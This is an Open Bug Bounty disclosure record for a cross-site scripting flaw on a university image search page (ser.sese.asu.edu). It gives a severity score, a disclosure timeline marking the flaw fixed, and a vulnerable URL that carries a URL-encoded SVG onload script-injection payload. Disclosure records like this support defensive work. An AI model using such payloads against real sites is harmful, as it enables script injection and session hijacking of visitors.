ser.sese.asu.edu XSS vulnerability

2016-02-16T06:47:00
ID OBB:135267
Type openbugbounty
Reporter Spam404
Modified 2018-03-15T01:56:00

Description

Open Bug Bounty ID: OBB-135267

Description| Value
---|---
Affected Website:| ser.sese.asu.edu
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://ser.sese.asu.edu/cgi-bin/ImageSearch.pl?search_LAT=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&lat_area=2.5&search_LON=&lon_area=2.5&FINDMET=&FINDDOY=&FINDYEAR=2000&search_REMOVE_BLANK=Yes&search_limitsearch=Yes&search_FITS_ONLY=No&html=1&startat=1&page=10&Submit=Search&search_MINRES=0&search_MAXRES=2520&search_MINPHA=0&search_MAXPHA=180&search_MININC=%22%3E%3Cs&search_MAXINC=180&search_MINEMA=0&search_MAXEMA=90&search_MINEXPDUR=1&search_MAXEXPDUR=998&search_MINSEQID=1&search_MAXSEQID=30&FILTER1=on&FILTER2=on&FILTER3=on&FILTER4=on&FILTER5=on&FILTER6=on&FILTER7=on&search_sort=met&search_sortdir=asc

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 16 February, 2016 06:47 GMT
Vulnerability Verified:| 16 February, 2016 06:49 GMT
Website Operator Notified:| 16 February, 2016 06:49 GMT
Vulnerability Published:| 16 February, 2016 06:49 GMT [without any technical details]
Vulnerability Fixed:| 15 March, 2018 01:56 GMT
Public Disclosure:| 15 March, 2018 01:56 GMT